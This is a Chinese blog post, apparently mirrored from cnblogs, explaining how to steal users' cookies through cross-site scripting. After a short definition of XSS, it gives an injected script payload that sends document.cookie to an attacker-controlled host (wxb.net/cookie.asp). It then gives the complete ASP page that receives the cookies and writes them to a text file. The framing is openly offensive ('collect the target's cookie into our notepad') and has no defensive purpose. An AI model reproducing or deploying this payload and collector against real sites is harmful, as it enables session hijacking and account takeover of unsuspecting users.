zoukankan      html  css  js  c++  java
  • XSS盗COOKIE

    XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。

    XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。

    方法/步骤

    1. 把客户的cookie信息收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是

      1 让目标访问已跨站的网址,然后这个网址执行脚本

    2. 2 然后跳转到你已经写好专门用来收集Cookie的网址 具体实现方法:先构造语句<script>window.open('http://wxb.net/cookie.asp?msg='+document.cookie)</script>这句话意思是打开一个新的窗口,访问http://wxb.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。

      这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:

      <html>

      <title>xx</title>

      <body>

      <%

      testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中

      msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值

      set fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象

      set thisfile = fs.OpenTextFile(testfile,8,True,0)

      thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie

      thisfile.close   //关闭

      set fs = nothing

      %>

      </body>

      </html>

       
  • 相关阅读:
    find 按文件修改时间查找文件
    Single- and Multichannel Memory Modes
    Jeff Dean Facts, Haha
    技巧:多共享动态库中同名对象重复析构问题的解决方法
    Processor technologies
    内存模型系列(上)- 内存一致性模型(Memory Consistency)
    python协程
    mysql学习笔记(1)
    python爬虫-----Python访问http的几种方式
    python基础 pyc
  • 原文地址:https://www.cnblogs.com/milantgh/p/3618292.html
Copyright © 2011-2022 走看看